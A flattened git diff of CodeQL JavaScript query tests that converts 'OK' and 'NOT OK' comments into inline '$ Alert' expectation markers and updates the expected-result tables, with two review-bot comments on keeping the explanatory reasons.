-| tst.js:3:2:3:11 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:2:1:5:1 | functio ... true;\\n} | Function f | tst.js:4:3:4:14 | return true; | elsewhere |
-| tst.js:101:2:101:11 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:100:9:103:1 | functio ... true;\\n} | Function u | tst.js:102:3:102:14 | return true; | elsewhere |
-| tst.js:107:2:107:7 | if (b)\\n\\t\\treturn 1; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:106:1:109:1 | functio ... rn 1;\\n} | Function v | tst.js:108:3:108:11 | return 1; | elsewhere |
+| tst.js:2:2:2:22 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:1:1:4:1 | functio ... true;\\n} | Function f | tst.js:3:3:3:14 | return true; | elsewhere |
+| tst.js:99:2:99:22 | if (foo ... n true; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:98:9:101:1 | functio ... true;\\n} | Function u | tst.js:100:3:100:14 | return true; | elsewhere |
+| tst.js:104:2:104:18 | if (b) ... turn 1; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:103:1:106:1 | functio ... rn 1;\\n} | Function v | tst.js:105:3:105:11 | return 1; | elsewhere |
diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref
index bcfdc72cc5d5..aa8e305805b5 100644
--- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref
+++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref
@@ -1 +1,2 @@
-Statements/ImplicitReturn.ql
\ No newline at end of file
+query: Statements/ImplicitReturn.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js index 114db4ed8d3e..a579d1a54139 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js @@ -1,17 +1,16 @@ -// NOT OK function f() { - if (foo()) + if (foo()) // $ Alert return true; } -// OK + function g() { if (foo()) return true; return false; } -// OK + function h() { open(); try { @@ -21,7 +20,7 @@ function h() { } } -// OK + function k(x) { switch (x) { case 1: @@ -31,20 +30,20 @@ function k(x) { } } -// OK + function l() { return 23; alert("Hi"); } -// OK + function m() { if (foo()) return true; throw new Error("not foo!"); } -// OK + function n() { if (foo()) return true; @@ -60,7 +59,7 @@ function foo() { } // -// OK: dual-use constructor +// OK - dual-use constructor function Point(x, y) { if (!(this instanceof Point)) return new Point(x, y); @@ -68,7 +67,7 @@ function Point(x, y) { this.y = y; } -// OK: infinite loops +// OK - infinite loops function q(n) { for (var i=0;;++i) if (i>2*n) @@ -96,14 +95,12 @@ function t(n) { } while("true"); } -// NOT OK var u = function() { - if (foo()) + if (foo()) // $ Alert return true; }; -// NOT OK function v(b) { - if (b) + if (b) // $ Alert return 1; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected index e3c5ac0b71d8..682ff7b23eda 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected 
@@ -1,3 +1,3 @@
-| tst.js:6:1:7:1 | for (j ... -j) {\\n} | This loop counts downward, but its variable is bounded upward. |
-| tst.js:10:1:11:1 | for (va ... ++) {\\n} | This loop counts upward, but its variable is bounded downward. |
-| tst.js:18:1:19:13 | for (i= ... i] = 0; | This loop counts downward, but its variable is bounded upward. |
+| tst.js:5:1:6:1 | for (j ... -j) {\\n} | This loop counts downward, but its variable is bounded upward. |
+| tst.js:8:1:9:1 | for (va ... ++) {\\n} | This loop counts upward, but its variable is bounded downward. |
+| tst.js:15:1:16:13 | for (i= ... i] = 0; | This loop counts downward, but its variable is bounded upward. |
diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref
index 8b296cfb160f..7a60789bb92b 100644
--- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref
+++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref
@@ -1 +1,2 @@
-Statements/InconsistentLoopOrientation.ql
\ No newline at end of file
+query: Statements/InconsistentLoopOrientation.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js
index f2331a705bdf..8172c8fbcb0f 100644
--- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js
+++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js
@@ -1,19 +1,16 @@ -// OK + for (j = i - 1; j >= 0; --j) { } -// NOT OK for (j = i + 1; j < strLength; --j) { -} +} // $ Alert -// NOT OK for (var i = 0, l = c.length; i > l; i ++) { -} +} // $ Alert + -// OK for (i=lower-1; i>=0; --i) a[i] = 0; -// NOT OK for (i=upper+1; i if (x > 0) x--; - x--; + x--; // $ Alert diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js index 11cc92b5b27a..f23767bfe19a 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js @@ -1,7 +1,7 @@ function bad1() { if (cond()) f(); - g(); + g(); // $ Alert } function good1() { @@ -22,7 +22,7 @@ function bad2() { f(); else g(); - h(); + h(); // $ Alert } function good3() { @@ -34,7 +34,7 @@ function good3() { function wbad1() { while (cond()) f(); - g(); + g(); // $ Alert } function wgood1() { diff --git a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected index 3b56bbcfc44a..c3b55f37146e 100644 --- a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected +++ b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected @@ -1 +1 @@ -| tst.js:3:16:3:18 | i>5 | Nested for statement uses loop variable $@ of enclosing $@. | tst.js:3:23:3:23 | i | i | tst.js:1:1:9:1 | for (va ... , k);\\n} | for statement | +| tst.js:2:16:2:18 | i>5 | Nested for statement uses loop variable $@ of enclosing $@. | tst.js:2:23:2:23 | i | i | tst.js:1:1:8:1 | for (va ... , k);\\n} | for statement | 
diff --git a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref index 65fe990bb6ee..a8d6bf7f1675 100644 --- a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref +++ b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref @@ -1 +1,2 @@ -Statements/NestedLoopsSameVariable.ql \ No newline at end of file +query: Statements/NestedLoopsSameVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js index bd82aad01997..37ed9bcc7a39 100644 --- a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js @@ -1,9 +1,8 @@ for (var i=0; i<10; ++i) { - // NOT OK - for (var j=i; i>5; --i) + for (var j=i; i>5; --i) // $ Alert f(i, j); - // OK + for (var k=0; k - +
    diff --git a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js index d94b71c8ab71..3e06b6ce43e2 100644 --- a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js @@ -1,2 +1 @@ -// NOT OK -return 42; \ No newline at end of file +return 42; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected index 3a9418b5d9ed..218e141aff4a 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected @@ -1,4 +1,4 @@ -| tst.js:4:7:4:11 | let x | For loop variable x is not used in the loop body. | -| tst.js:138:6:138:23 | const [key, value] | For loop variable value is not used in the loop body. | -| tst.js:151:6:151:35 | const [ ... value] | For loop variable value is not used in the loop body. | -| tst.js:152:6:152:10 | let i | For loop variable i is not used in the loop body. | +| tst.js:3:7:3:11 | let x | For loop variable x is not used in the loop body. | +| tst.js:136:6:136:23 | const [key, value] | For loop variable value is not used in the loop body. | +| tst.js:148:6:148:35 | const [ ... value] | For loop variable value is not used in the loop body. | +| tst.js:149:6:149:10 | let i | For loop variable i is not used in the loop body. | 
diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref index e6317f67d4b4..77831cc4eb34 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref @@ -1 +1,2 @@ -Statements/SuspiciousUnusedLoopIterationVariable.ql +query: Statements/SuspiciousUnusedLoopIterationVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js index f06c40664654..6deedccfd340 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js @@ -1,13 +1,12 @@ -// BAD function countOccurrences(xs, p) { var count = 0; - for (let x of xs) + for (let x of xs) // $ Alert if (p()) ++count; return count; } -// OK + function countOccurrences(xs, p) { var count = 0; for (let x of xs) @@ -16,7 +15,7 @@ function countOccurrences(xs, p) { return count; } -// OK + function countOccurrences(xs, p) { var count = 0; for (let unused of xs) @@ -25,14 +24,14 @@ function countOccurrences(xs, p) { return count; } -// OK + function isEmpty(o) { for (var x in o) return false; return true; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) @@ -40,7 +39,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) { 
@@ -49,7 +48,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) @@ -57,7 +56,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) @@ -65,7 +64,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) { @@ -75,7 +74,7 @@ function getNumElt(o) { return count; } -// OK + function f(o) { for (var p in o) (function() { @@ -83,20 +82,20 @@ function f(o) { })(); } -// OK + function lastProp(o) { var key; for (key in obj); return key; } -// OK + function g() { for (var unused in {"toString": null}) hasDontEnumBug = false; } -// OK + function is_empty(obj) { var empty = true; for (var key in obj) { @@ -106,7 +105,7 @@ function is_empty(obj) { return empty; } -// OK + function f(objs) { var non_empties = 0; for (var obj in objs) { @@ -118,7 +117,7 @@ function f(objs) { return non_empties; } -// OK: dead loops are not flagged +// OK - dead loops are not flagged function countOccurrencesDead(xs, p) { return; var count = 0; @@ -134,19 +133,17 @@ function countOccurrencesDead(xs, p) { } }); -// NOT OK -for (const [key, value] of array) {} +for (const [key, value] of array) {} // $ Alert -// OK: for array-destructurings we only flag the last element +// OK - for array-destructurings we only flag the last element for (const [key, value] of array) { console.log(value) } -// OK: for array-destructurings we only flag the last element +// OK - for array-destructurings we only flag the last element for (const [key, key2, key3, value] of array) { console.log(value) } -// NOT OK -for (const [key, key2, key3, value] of array) {} -for (let i of [1, 2]) {} \ No newline at end of file +for (const [key, key2, key3, value] of array) {} // $ Alert +for (let i of [1, 2]) {} // $ Alert \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref b/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref index 1751a9ed7a25..ef8e535dac61 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref @@ -1 +1,2 @@ -Statements/UnreachableStatement.ql \ No newline at end of file +query: Statements/UnreachableStatement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js index 446e51ede1e4..a0a7ddf33416 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js @@ -2,7 +2,7 @@ function f() { return 23; - var a = 42; + var a = 42; // $ Alert } function g(x) { @@ -35,7 +35,7 @@ function k() { } throw new Error(); -f(); +f(); // $ Alert function l(x) { switch(x) { @@ -60,7 +60,7 @@ function m(x) { if (true) x; else - y; + y; // $ Alert function f(){ if (x) { diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts b/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts index 35ce5c6692ba..66eabeb7f073 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts @@ -1,5 +1,5 @@ export function foo(x: number): number { let y : A = x; return y; - type A = number; // OK. + type A = number; } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref index 99db4d93c30a..766afa541076 100644 
--- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref @@ -1 +1,2 @@ -Statements/UseOfReturnlessFunction.ql \ No newline at end of file +query: Statements/UseOfReturnlessFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html index b8a041b65517..63c77ef3f76b 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html @@ -16,6 +16,6 @@
    Foo
    Click me
    -
    Click me
    +
    Click me
    \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7b9968115f5e..37da0c7e2a6a 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -17,17 +17,17 @@ console.log(returnsValue()) console.log(stub()) - console.log(onlySideEffects()); // Not OK! + console.log(onlySideEffects()); // $ Alert - var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK! A is never used. + var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. - var b = onlySideEffects(); + var b = onlySideEffects(); // $ Alert console.log(b); - var c = 42 + (onlySideEffects(), 42); // OK, value is thrown away. + var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. console.log(c); - var d = 42 + (42, onlySideEffects()); // NOT OK! + var d = 42 + (42, onlySideEffects()); // $ Alert console.log(d); if (onlySideEffects()) { @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // NOT OK! + var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert console.log(e); function onlySideEffects2() { @@ -50,11 +50,11 @@ } var bothOnlyHaveSideEffects = Math.random() > 0.5 ? onlySideEffects : onlySideEffects2; - var f = bothOnlyHaveSideEffects(); // NOT OK! + var f = bothOnlyHaveSideEffects(); // $ Alert console.log(f); var oneOfEach = Math.random() > 0.5 ? onlySideEffects : returnsValue; - var g = oneOfEach(); // OK + var g = oneOfEach(); console.log(g); function alwaysThrows() { 
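Review bot: The new marker on `var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert` in the `@@ -42,7 +42,7 @@` hunk records a known false negative without saying why the query misses it. `UselessConditional.js` in this same commit gives the cause inline (`// $ MISSING: Alert - due to SSA limitations`), and the same convention would help here, for example `// $ MISSING: Alert - call through .apply is not resolved`, with the wording confirmed against the query. Without a reason a later reader cannot tell whether this is an accepted limitation or a gap that should be closed.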
@@ -66,28 +66,28 @@ throw new Error("Important error!") } - var h = returnsValue() || alwaysThrows(); // OK! + var h = returnsValue() || alwaysThrows(); console.log(h); function equals(x, y) { return x === y; } - var foo = [1,2,3].filter(n => {equals(n, 3)}) // NOT OK! + var foo = [1,2,3].filter(n => {equals(n, 3)}) // $ Alert console.log(foo); import { filter } from 'lodash' - var bar = filter([1,2,4], x => { equals(x, 3) } ) // NOT OK! + var bar = filter([1,2,4], x => { equals(x, 3) } ) // $ Alert console.log(bar); - var baz = [1,2,3].filter(n => {n === 3}) // OK + var baz = [1,2,3].filter(n => {n === 3}) console.log(baz); class Deferred { } - new Deferred().resolve(onlySideEffects()); // OK + new Deferred().resolve(onlySideEffects()); Promise.all([onlySideEffects(), onlySideEffects()]) })(); @@ -104,16 +104,16 @@ class Foo { class Bar extends Foo { constructor() { - console.log(super()); // OK. + console.log(super()); } } () => { let equals = (x, y) => { return x === y; }; - var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // $ Alert console.log(foo); - var foo = [1,2,3].findLast(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLast(n => { equals(n, 3); }) // $ Alert console.log(foo); } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts index 6da3bde4bf01..758b4480c64e 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts @@ -3,4 +3,4 @@ declare function returnsSomething(): number; console.log(returnsSomething()); -console.log(returnsVoid()); // NOT OK! \ No newline at end of file +console.log(returnsVoid()); // $ Alert \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref index ade7e7d0607e..d75778a10b0b 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref @@ -1 +1,2 @@ -Statements/UselessComparisonTest.ql +query: Statements/UselessComparisonTest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js index aa5ee0e1fb5b..dd0468451930 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js @@ -1,4 +1,4 @@ function f() { - if (1 > 2) {} else {} // NOT OK - always false - if (1 > 0) {} else {} // NOT OK - always true + if (1 > 2) {} else {} // $ Alert - always false + if (1 > 0) {} else {} // $ Alert - always true } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js index a40fc483a06c..f16d5a000a22 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js @@ -1,11 +1,11 @@ function defaultParam(param = 0) { - if (param > 0) {} // OK + if (param > 0) {} } function defaultPattern(obj, arr) { let { prop = 0 } = obj; - if (prop > 0) {} // OK + if (prop > 0) {} let [ elm = 0 ] = arr; - if (elm > 0) {} // OK + if (elm > 0) {} } 
diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js index 53496ce2e4ef..cf0c23603e2a 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js @@ -5,7 +5,7 @@ function findValue(values, x, start, end) { return i; } } - if (i < end) { + if (i < end) { // $ Alert return i; } return -1; diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js index 7e198d0e0293..a8064ae69429 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js @@ -2,5 +2,5 @@ function test() { let x = (function() { if (g) return 5; })(); - if (x + 1 < 5) {} // OK + if (x + 1 < 5) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js index 4cc1fd775a43..58b9232cc161 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js @@ -5,6 +5,6 @@ }); (function(){ - (function (i) { if (i == 100000) return; })(1); - (function f(i) { if (i == 100000) return; f(i+1); })(1); + (function (i) { if (i == 100000) return; })(1); // $ Alert + (function f(i) { if (i == 100000) return; f(i+1); })(1); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index fe4bb6486ce0..edba36470508 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js 
+++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -2,35 +2,35 @@ function getLastLine(input) { var lines = [], nextLine; while ((nextLine = readNextLine(input))) lines.push(nextLine); - if (!lines) + if (!lines) // $ Alert throw new Error("No lines!"); return lines[lines.length-1]; } function lookup(cache, k) { var v; - return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); + return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); // $ Alert } function test(a, b) { if (!a && !b) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } if (!(a || b)) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } var x = new X(); - if(x){} - if (new X()){} - if((x)){} - if(((x))){} - if ((new X())){} + if(x){} // $ Alert + if (new X()){} // $ Alert + if((x)){} // $ Alert + if(((x))){} // $ Alert + if ((new X())){} // $ Alert x = 0n; - if (x) // NOT OK + if (x) // $ Alert ; } @@ -40,7 +40,7 @@ async function awaitFlow(){ if (y) v = await f() - if (v) { // OK + if (v) { } } 
@@ -51,92 +51,92 @@ async function awaitFlow(){ var known = knownF(); if (known) return; - if (known) + if (known) // $ Alert return; var unknown = unknownF(); if (unknown) return; - if (unknown) // NOT OK + if (unknown) // $ Alert return; }); (function (...x) { - x || y // NOT OK + x || y // $ Alert }); (function() { function f1(x) { - x || y // NOT OK, but whitelisted + x || y // OK } f1(true); function f2(x) { while (true) - x || y // NOT OK + x || y // $ Alert } f2(true); function f3(x) { (function(){ - x || y // NOT OK, but whitelisted + x || y // OK }); } f3(true); }); (function() { - if ((x, true)); + if ((x, true)); // $ Alert }); (function (x, y) { if (!x) { - while (x) { // NOT OK + while (x) { // $ Alert f(); } - while (true) { // OK + while (true) { break; } - if (true && true) {} // NOT OK - if (y && x) {} // NOT OK - if (y && (x)) {} // NOT OK - do { } while (x); // NOT OK + if (true && true) {} // $ Alert + if (y && x) {} // $ Alert + if (y && (x)) {} // $ Alert + do { } while (x); // $ Alert } }); (function(x,y) { - let obj = (x && {}) || y; // OK - if ((x && {}) || y) {} // NOT OK + let obj = (x && {}) || y; + if ((x && {}) || y) {} // $ Alert }); (function(){ function constantFalse1() { return false; } - if (constantFalse1()) // OK + if (constantFalse1()) return; function constantFalse2() { return false; } let constantFalse = unknown? constantFalse1 : constantFalse2; - if (constantFalse2()) // OK + if (constantFalse2()) return; function constantUndefined() { return undefined; } - if (constantUndefined()) // NOT OK + if (constantUndefined()) // $ Alert return; function constantFalseOrUndefined1() { return unknown? false: undefined; } - if (constantFalseOrUndefined1()) // NOT OK + if (constantFalseOrUndefined1()) // $ Alert return; let constantFalseOrUndefined2 = unknown? constantFalse1 : constantUndefined; - if (constantFalseOrUndefined2()) // NOT OK + if (constantFalseOrUndefined2()) // $ Alert return; }); 
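Review bot: In `f1` and `f3` the comment `// NOT OK, but whitelisted` is reduced to a bare `// OK`, which drops the only record that these `x || y` checks are useless conditionals the query deliberately suppresses; the same reduction is applied to `if (!x && something())` in the later `@@ -173,14 +173,14 @@` hunk. `UselessConditionalGood.js` in this commit keeps the reason in the form `// OK - whitelisted`, so I would write `x || y // OK - whitelisted` here as well. That keeps the two fixtures consistent and makes it clear that an alert appearing on these lines after a query change is a change to the suppression logic rather than a newly found true positive.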
@@ -145,12 +145,12 @@ async function awaitFlow(){ function p() { return {}; } - if (p()) { // NOT OK + if (p()) { // $ Alert } var v = p(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -160,12 +160,12 @@ async function awaitFlow(){ if (e) return e; throw new Error(); } - if(findOrThrow()){ // NOT OK + if(findOrThrow()){ // $ Alert } var v = findOrThrow(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -173,14 +173,14 @@ async function awaitFlow(){ function f(){ return { v: unkown };} f(); var { v } = f(); - if (v) { // OK + if (v) { } }); (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // NOT OK, but whitelisted + if (!x && something()) { // OK something(); } }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref index d29916245d6e..85ffff223221 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref @@ -1 +1,2 @@ -Statements/UselessConditional.ql \ No newline at end of file +query: Statements/UselessConditional.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js index 7b3888c982a4..74e2c0f2439f 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js 
@@ -11,90 +11,90 @@ function getLastLine(input) { function f1() { return false } - if(f1()){} // OK, whitelisted + if(f1()){} // OK - whitelisted function f2() { return false } - if(!f2()){} // OK, whitelisted + if(!f2()){} // OK - whitelisted function f3() { return false } - if(!!f3()){} // OK, whitelisted + if(!!f3()){} // OK - whitelisted function f4() { return false } - if(f4() || o.p){} // OK, whitelisted + if(f4() || o.p){} // OK - whitelisted function f5() { return false } var v5 = f5(); - if(v5){} // OK, whitelisted + if(v5){} // OK - whitelisted function f6() { return false } var v6 = f6(); - if(!!v6){} // OK, whitelisted + if(!!v6){} // OK - whitelisted })(); (function tooGeneralFunctions(){ function f1(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f1(undefined); f1({}); function f2(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f2(undefined); function f3(x1) { var x2 = x1; - if(x2){} // NOT OK, not whitelisted + if(x2){} // $ Alert - not whitelisted } f3(undefined); function f4(x) { - 